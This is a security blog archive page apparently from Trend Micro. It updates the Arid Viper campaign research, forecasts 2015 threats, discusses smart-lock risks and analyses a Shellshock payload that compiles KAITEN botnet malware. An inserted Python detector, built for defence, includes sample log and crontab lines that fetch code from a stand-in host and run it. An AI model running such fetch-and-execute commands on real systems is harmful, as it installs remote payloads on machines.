    TrendLabs Security Intelligence Blog

    Author Archive - Trend Micro

    Last week, we released a research paper titled “Operation Arid Viper: Bypassing the Iron Dome” where we detailed two related campaigns. To recall, here are our key findings related to the two campaigns:

    • Palestinian threat actors have staged a targeted attack, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government and have been doing so since mid-2013. The attacks are still on-going, coinciding with the political tension between Israel and Palestinians.
    • Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) that have less technical knowhow and are attacking other Egyptians in less purposeful attacks.
    • Both groups have strong Arab ties, and the same server and site registration details suggest the existence of a supra-organization, a forum or an influential sponsor could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

    • None of the C&C domains have moved to other hosting providers or had other major changes since the publishing of our report. Although we have not seen newly compiled samples being spread – we have seen 2 recent attempted infections with existing binaries from Arid Viper on the 15th and 19th of February against a target in Israel and Kuwait respectively. For reference, our paper went public on the 16th.
    • Interestingly, a number of the people linked to the C&C servers in the paper have made changes to their public profiles since the paper went live. To date none of these individuals have contacted us to dispute the details we outlined in the paper:
      • The Facebook account we mentioned in the paper for Fathy Mostafa is now no longer active.
      • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed. Upon inspection today, his accounts on Blogspot, Facebook, and Twitter are no longer active. His main webpage, which had hosted two questionable tools we outlined in the report, has been changed to remove all of that content and has been replaced with the words “Closed by DevHima”:

    Screenshot taken 2015-02-24 of the replaced webpage

    • Some of his other accounts such as his LinkedIn, SoundHound, and YouTube (which is hard to remove without deleting your personal Gmail account) are still live at the time of writing.
    • After further investigation, we now believe that the email used to register the C&C pstcmedia[dot]com actually belongs to the Web hosting provider that registered this domain on a client’s behalf – and is not an individual involved in the campaign itself. We have updated our paper to remove reference to Mr. Samraa with the exception that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks |

    For many organizations today, the question is no longer if they will fall victim to a targeted attack, but when. In such an event, how an organization responds will determine whether it becomes a serious event or if it stays a mere annoyance.

    This requires something of a change of mindset for information security professionals. Previous techniques and many best practices are under the premise that an attacker can be kept out.

    However, that’s no longer the case today. The malware used in targeted attacks is frequently not detected (because it’s been custom-made for specific organizations). A well-crafted social engineering attack can look like a normal business email or engaging click bait.

    In short, an attacker with sufficient resources will be able to find their way inside their target, regardless of what the defender does. The defender can raise the price of getting in, but not prevent it entirely.

    The SANS Institute provides some guidelines to organizations on how they should react to incidents. Broadly speaking, however, the response can be divided into four steps:


    Posted in Targeted Attacks | Comments Off

    2014 brought with it many significant additions to the technology landscape. These put new capabilities into the hands of users and companies that allowed them to do things that they would not have thought possible before. However, these same changes also aid threat actors: threats can now come from unexpected vectors, and augment the existing capabilities that attackers already possess.

    What are the key developments that will shape the threat landscape of tomorrow, and how do we foresee its evolution? These are the trends that we think will shape 2015:

    More cybercriminals will turn to darknets and exclusive-access forums to share and sell crimeware.

    We’ve seen cybercriminals leveraging Deep Web and other darknet services as well as untraceable peer-to-peer networks (e.g. Tor, I2P, Freenet) for selling and exchanging tools and services. Takedowns and collaborative efforts between researchers and law enforcement agencies have disrupted cybercrime gangs, giving them more reasons to go further underground. Security firms together with law enforcement agencies need to extend their reach by providing threat intelligence and having one definition of cybercrime to help law enforcers regardless of jurisdiction, to catch cybercriminals and attackers.

    Increased cyber activity will translate to better, bigger, and more successful hacking tools and attempts.

    Cybercriminals will go after bigger targets rather than home users as this can generate more profits for them. We will see more data breach incidents, with banks, financial institutions, and customer data holders remaining attractive targets. As such, organizations and individuals need to assume compromise; enterprises need to constantly monitor their network for any threats while individual users must regularly change their passwords to prevent data theft.

    Exploit kits will target Android, as mobile vulnerabilities play a bigger role in device infection.

    Aside from the growth of Android threats, we will see more vulnerabilities found in mobile devices, apps, and platforms in the coming year. Cybercriminals will target data stored in these mobile devices. In addition, attackers may employ tools similar to Blackhole Exploit Kit (BHEK), leveraging Android OS fragmentation. Traditional threats like ransomware will plague the mobile landscape as well.

    Targeted attacks will become as prevalent as cybercrime.

    The success of high-profile targeted attack campaigns has highlighted the fact that cyber attacks are useful means of gathering intelligence. With this, we will see targeted attacks from other countries, not just countries that are commonly said to be the source of these attacks. We will observe more diversity in terms of targets and attack origins as more threat actors with differing agendas are seen. Although the motivations of threat actors may vary, they will continue to steal information such as top-secret government data, financial information, intellectual property, and industry blueprints, among others. Social media will become a new entry point for targeted attacks.

    New mobile payment methods will introduce new threats.

    The introduction of Apple Pay with the iPhone 6 and 6 Plus may kickstart the adoption of mobile payment systems by many consumers. Apple Pay is not alone in the market – other payment systems have or will be introduced by other companies and trade associations. Not all of these payment systems have been thoroughly tested to withstand real-world threats, and we may see attacks targeting mobile commerce in 2015.

    We will see more attempts to exploit vulnerabilities in open source apps.

    In 2014, we saw several vulnerabilities in open-source projects such as Shellshock and Heartbleed. These vulnerabilities were undetected for years and were only brought to light recently. Due to the massive impact of these vulnerabilities, cybercriminals and attackers may decide to investigate the existing code and see if other dormant vulnerabilities are present.

    They will also set their eyes on other less-known platforms, protocols, and software. Furthermore, they will look for vulnerabilities found in open source platforms and apps (for example Open SSL v3) as well as OS kernels.

    Technological diversity will save IoE/IoT devices from mass attacks but the same won’t be true for the data they process.

    A wide variety of devices will make up the Internet of Things/Internet of Everything – from fitness devices to smart home appliances, the smartification of everything will continue apace. This variety will also provide this field some measure of safety – no single attack will cover all of these devices. However, the data gathered by these devices may well be at risk if companies providing various IoE services are breached.

    More severe online banking and other financially motivated threats will surface.

    Weak security practices like not using two-factor authentication and chip-and-pin technology continue to persist in the banking sector. These practices will cause financially motivated threats to grow in scale throughout the coming year.

    Apart from credentials, cybercriminals will steal user identities. Mobile device users will also be affected by these threats as cybercriminals launch mobile phishing attacks and use fake apps and domain name system (DNS) changers. We will see stealthier mobile threats that use packers similar to those used by desktop software.

    More details about these predictions can be found at Trend Micro Security Predictions for 2015 and Beyond.


    Security is one of the top concerns when consumers consider buying smart devices. With cybercrime making the headlines every day, one has to think: is this smart device vulnerable to cyber attacks? Are these technologies secure enough for us to rely on them in our everyday lives?

    A good example of a technology that we need to assess for its security and reliability is the smart lock. One of the key characteristics of smart locks is the use of digital door keys, which are used to open them. Digital door keys are typically stored in the vendor’s cloud servers, along with other properties of the lock. This gives the owner great convenience, since they can “send” the keys to other people remotely in order to allow them temporary access. It also enables the user to do comprehensive monitoring/reporting, for example, to detect any forced entry, to report any breakage to the lock, to send alerts to the user, etc.

    Smart locks, however, raise certain security risks as well. For instance, attackers may choose to target the vendor’s cloud servers, which may exist anywhere in the world, to get access to key information. Or if the smart lock supports web access, the attacker may attack the portal through code injection, cross-site scripting, etc. They may also launch phishing attacks to obtain the user’s credentials to the vendor’s web portal used to manage the lock.

    The attackers can also target the communication between the owner’s smart lock and mobile device. Bluetooth Low Energy (BLE) is a popular protocol used for communication between the smart door lock and a mobile device or mobile key fob. During the communication process, the digital key is sent from the mobile phone to the door lock over the air via BLE. The said communication is encrypted, but certain implementations can be subject to man-in-the-middle (MITM) attacks, as discussed in the security community. Since this type of attack requires capturing the packet exchange during device setup, the time window for attack is short, which reduces the attack surface significantly. However, it’s up to the vendor to provide a strong BLE security implementation.

    Some brands of smart locks allow the user to lock/unlock from anywhere in the world. You can use the vendor’s mobile app or web portal to check the lock status and lock/unlock it with a tap. This can be a desired feature for many consumers because of the ease and convenience it offers. The feature, however, does increase the attack surface. In this case, instead of using BLE, the commands to the smart lock are sent over the Internet to the home router and then to the lock via the home Wi-Fi network, so the smart lock device is visible in the local area network. Traditional IP-based attacks such as port scanning and remote attacks via open ports or firmware vulnerabilities can be used against the device.

    The Internet of Everything revolutionizes traditional hardware functionalities. While it creates security challenges, it also provides great opportunities. In the smart lock case, one can implement comprehensive monitoring/reporting, for example, to detect any forced entry or breakage of the lock and to send an alert to the user along with a picture of the broken lock and of the attacker. For critical IoE devices (such as the door lock of a home), comprehensive monitoring/reporting is important to ensure software and hardware integrity and to detect any malicious software/hardware attacks.

    For more detailed discussion on consumer buyer’s guide for smart home devices, you can read our Security Considerations for Consumers Buying Smart Home Devices.

    Posted in Internet of Everything | Comments Off

    Since the discovery of Shellshock, Trend Micro has continuously monitored the threat landscape for any attacks that may leverage these vulnerabilities. So far, we have identified an active IRC bot, exploit attempts in Brazil and China, botnet attacks, and a wide variety of malware payloads such as ELF_BASHLITE.A, ELF_BASHLET.A, and PERL_SHELLBOT.WZ among others. It has also been reported that Shellshock can be reached through other protocols such as HTTP, SMTP, SSH, and FTP.

    We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of KAITEN malware, which is used to carry out denial-of-service attacks. Based on our analysis, when TROJ_BASHKAI.SM is executed, it connects to the following malicious URLs:

    • http://www[dot]computer-services[dot]name/b[dot]c
    • http://stablehost[dot]us/bots/regular[dot]bot

    When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the KAITEN source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file. Instead, it builds and compiles the source code, resulting in an executable file detected as ELF_KAITEN.SM.

    The act of downloading and compiling on the infected system can be seen as a precautionary measure. Downloaded directly as an executable file, the ELF file may have compatibility issues with different Linux OS distributions. Compiling on the infected system ensures that the malware executes properly.

    This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file. In addition, the recompilation of the source code can also have an effect of having differing binary files (which will have different hashes) across different Unix platforms. This will make detecting compiled binaries more difficult.

    ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net where it joins the IRC channel #pwn and waits for commands. Some of the commands the attackers issued are:

    • Perform UDP flood
    • Perform SYN flood
    • Download files
    • Send raw IRC command
    • Start remote shell
    • Perform PUSH-ACK flood
    • Disable, enable, terminate client

    On the other hand, when it connects to http://stablehost[dot]us/bots/regular[dot]bot, it downloads three separate files. One of these is KAITEN source code, which is similarly compiled into ELF_KAITEN.A. This behaves similarly to ELF_KAITEN.SM, except it connects to linksys[dot]secureshellz[dot]net[colon]25 and to the channel #shellshock.

    The second downloaded file is a Mac OS X malware detected as OSX_KAITEN.A, which behaves similarly to ELF_KAITEN.A. The third file is a shellbot detected as PERL_SHELLBOT.SMO. This is a powerful IRC-controlled shellbot that connects to the same server as the two previous files, but to a different channel (#scan). However, unlike KAITEN, which doesn’t scan for vulnerable servers, PERL_SHELLBOT.SMO scans for vulnerable websites through various search engines.

    Aside from downloading KAITEN and Shellbot, the downloader (detected as TROJ_BASHKAI.SM) creates a file /tmp/c which is used to schedule the weekly download of a file from the second URL. This ensures that the payload is up to date.


    Figure 1. Screenshot of BASHKAI source code
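    The download-source-then-compile routine and the scheduled re-download described above are both observable on the host. As an added example (not Trend Micro's code, and not derived from the malware beyond what the post states), the following Python script flags a fetch-of-source, compile, execute chain in process-execution records, and a crontab entry that periodically fetches a payload from a URL. The record format, the `cnc.example.invalid` host, file paths and cron lines are all constructed for the example.

```python
"""Host-side detection of the fetch -> compile -> run pattern (added example).

Constructed process-execution records of the form
    <unix_ts> pid=<n> ppid=<n> argv=<command line>
stand in for auditd execve events or EDR telemetry. Compiling a fetched
source file defeats hash-based matching of the resulting binary, so the
detector keys on the behaviour chain instead of on file hashes.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

FETCHERS = {"curl", "wget", "fetch"}
COMPILERS = {"gcc", "cc", "clang", "tcc"}
SOURCE_EXT = re.compile(r"\.(c|cc|cpp|pl|py|sh)$", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
EVENT_RE = re.compile(r"(\d+)\s+pid=(\d+)\s+ppid=(\d+)\s+argv=(.*)$")
# five time fields or an @shortcut, then the command
CRON_RE = re.compile(r"^(@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$")


@dataclass
class ExecEvent:
    ts: int
    pid: int
    ppid: int
    argv: List[str]


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def parse_event(line: str) -> Optional[ExecEvent]:
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return ExecEvent(int(m[1]), int(m[2]), int(m[3]), m[4].split())


def fetched_source(argv: List[str]) -> Optional[str]:
    """Local path of a source file fetched from a URL, or None."""
    if basename(argv[0]) not in FETCHERS:
        return None
    urls = [a for a in argv if URL_RE.match(a)]
    if not urls:
        return None
    out = basename(urls[0].split("?")[0])      # default: remote file name
    for i, a in enumerate(argv[:-1]):          # curl -o FILE / wget -O FILE
        if a in ("-o", "-O"):
            out = argv[i + 1]
    return out if SOURCE_EXT.search(out) else None


def compiled_output(argv: List[str], sources: dict) -> Optional[Tuple[str, str]]:
    """(source name, binary path) if argv compiles a previously fetched source."""
    if basename(argv[0]) not in COMPILERS:
        return None
    inputs = [basename(a) for a in argv[1:] if basename(a) in sources]
    if not inputs:
        return None
    binary = "a.out"                           # compiler default when -o is absent
    for i, a in enumerate(argv[:-1]):
        if a == "-o":
            binary = argv[i + 1]
    return inputs[0], binary


def detect_compile_chain(lines) -> List[Tuple[int, str, str]]:
    """Return (ppid, source_path, binary_path) for each fetch->compile->execute chain.

    Events are correlated per parent process, i.e. per shell session.
    """
    sessions = {}  # ppid -> {"sources": {name: path}, "binaries": {name: (src, bin)}}
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not ev.argv:
            continue
        s = sessions.setdefault(ev.ppid, {"sources": {}, "binaries": {}})
        src = fetched_source(ev.argv)
        if src is not None:
            s["sources"][basename(src)] = src
            continue
        compiled = compiled_output(ev.argv, s["sources"])
        if compiled is not None:
            src_name, binary = compiled
            s["binaries"][basename(binary)] = (s["sources"][src_name], binary)
            continue
        chain = s["binaries"].get(basename(ev.argv[0]))
        if chain is not None:                  # the compiled artefact was executed
            hits.append((ev.ppid, chain[0], chain[1]))
    return hits


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Cron commands that download from a URL with a fetcher (scheduled re-download)."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_RE.match(line.strip())
        if not m or line.lstrip().startswith("#"):
            continue
        cmd = m["cmd"]
        words = cmd.replace("|", " ").replace(";", " ").split()
        if any(basename(w) in FETCHERS for w in words) and URL_RE.search(cmd):
            hits.append(cmd)
    return hits


# Constructed sample telemetry (host and paths are placeholders, not real IoCs).
SAMPLE_EXEC_LOG = """\
1412000001 pid=2001 ppid=1999 argv=wget http://cnc.example.invalid/b.c -O /tmp/b.c
1412000002 pid=2002 ppid=1999 argv=gcc /tmp/b.c -o /tmp/.k
1412000003 pid=2003 ppid=1999 argv=/tmp/.k
1412000004 pid=2101 ppid=2099 argv=wget https://example.invalid/notes.txt
1412000005 pid=2102 ppid=2099 argv=gcc hello.c -o hello
"""

SAMPLE_CRONTAB = """\
# constructed crontab: one weekly re-download entry among benign jobs
0 3 * * 0 wget -q http://cnc.example.invalid/bots/regular.bot -O /tmp/.update && sh /tmp/.update
@daily /usr/bin/logrotate /etc/logrotate.conf
30 2 * * 1-5 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for hit in detect_compile_chain(SAMPLE_EXEC_LOG.splitlines()):
        print("fetch->compile->run chain in session ppid=%d: %s -> %s" % hit)
    for cmd in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("scheduled download:", cmd)
```

    Correlating by parent process keeps an unrelated developer build (the `hello.c` session above) out of the results; a real deployment would add a time window between the three steps and an allow-list for build hosts.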


    KAITEN is old IRC-controlled DDoS malware and as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organizations. Another theory we have is that the attackers behind Shellshock would like to expand their infection chain to include DDoS activities via KAITEN malware.

    Typically, systems infected with Shellshock payloads become part of a botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly shows that attackers are broadening their target platforms.

    It was earlier reported that the “vast majority” of Mac OS X users are “safe by default” from Shellshock. However, users who have enabled the Advanced Unix Services are still affected by this vulnerability. The Advanced Unix Services option enables remote access via Secure Shell (SSH), which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled on machines used as servers, such as web servers, which are the common targets of Shellshock attacks.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding Shellshock. For more information about threats exploiting Shellshock, you can refer to our summary post.

    With additional analysis from Rhena Inocencio, Lenart Bermejo, Anthony Melgarejo, and Dexter To

    Posted in Exploits, Mac, Malware, Vulnerabilities | Comments Off


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice